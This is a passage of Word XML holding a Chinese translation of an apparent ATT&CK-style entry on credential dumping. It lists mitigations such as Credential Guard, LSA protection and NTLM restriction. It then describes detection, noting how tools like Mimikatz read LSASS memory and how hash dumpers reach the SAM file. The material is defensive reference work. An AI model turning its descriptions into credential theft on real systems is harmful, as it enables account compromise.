      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启发的开源工具。该工具转储进程内存，然后通过查找文本字符串和正则表达式模式来收集密码和哈希，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了解给定的应用程序（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Gnome Keyring</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如何使用内存来存储身份</w:t>
      </w:r>
      <w:r w:rsidR="00A73C37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证相关信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C1D708" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00146707" w14:paraId="6580F555" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4B634C3C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00146707" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00146707">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3B707D3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00146707" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00146707">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="43F4FB01" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F50A0DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId131" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>活动目录配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7337EFBC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>复制目录更改</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的访问控制列表以及与域控制器复制相关的其他权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="5075D6D3" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="284E2B02" w14:textId="6FE066FB" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId132" w:history="1">
              <w:r w:rsidR="006508E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>凭据访问</w:t>
              </w:r>
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>保护</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D4B6CE" w14:textId="1EB6AE9D" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中，微软实现了名为</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t xml:space="preserve"> “</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的新功能，来保护</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">LSA </w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>secrets</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">LSA </w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>secrets</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可用于通过</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>导出</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来获取</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）。默认情况下未配置此功能。若要配置</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>此功能，需要满足</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>硬件和固件系统要求。此功能还不能防止所有形式的</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>导出。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="0B613563" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53BF3C43" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId133" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A77A77C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑禁用或限制</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTLM</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="1FCC0F74" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B49DBAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId134" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B7D44FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保本地管理员账号在网络上所有系统中都有复杂且唯一的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="27E020AE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="381"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72798671" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId135" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B278AD2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：除非用户或管理域账号受到严格控制，否则请勿将它们放在不同系统的本地管理员组中，因为这通常相当于在所有这些系统上使用有相同密码的本地管理员账</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>号。遵循企业网络设计和管理的最佳实践，限制在不同管理层使用特权账号。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7705782C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：从内存中获取密码需要</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限。遵循特权</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>账号访问限制的</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最佳实践，避免恶意程序访问内存中</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>此类敏感区域。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="100ED291" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C526DE1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId136" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权进程完整性</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="614E3331" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows 8.1</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows Server 2012 R2</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上，为</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:t>Protected Process Light</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="001F66BD" w14:paraId="7B075CF5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23B0D081" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId137" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="001F66BD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户培训</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="513BB7CF" w14:textId="2A05D282" w:rsidR="000F2665" w:rsidRPr="001F66BD" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过培训用户和管理员不要对多个账号使用相同密码来限制账号和系统之间的</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="001F66BD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重叠。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64861E42" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0843C28A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8AE593" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00146707" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146707">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D961025" w14:textId="7A407D29" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序通过打开进程，找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥并解密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详细信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的区域</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程。</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序还可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用反射式过程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来减少恶意活动的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指示信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F629D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希转储程序在本地文件系统（</w:t>
      </w:r>
      <w:r>
        <w:t>%SystemRoot%/system32/config/SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）上打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或创建注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥的转储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问存储的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码哈希。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希转储程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开本地文件系统作为设备并解析到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20797">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
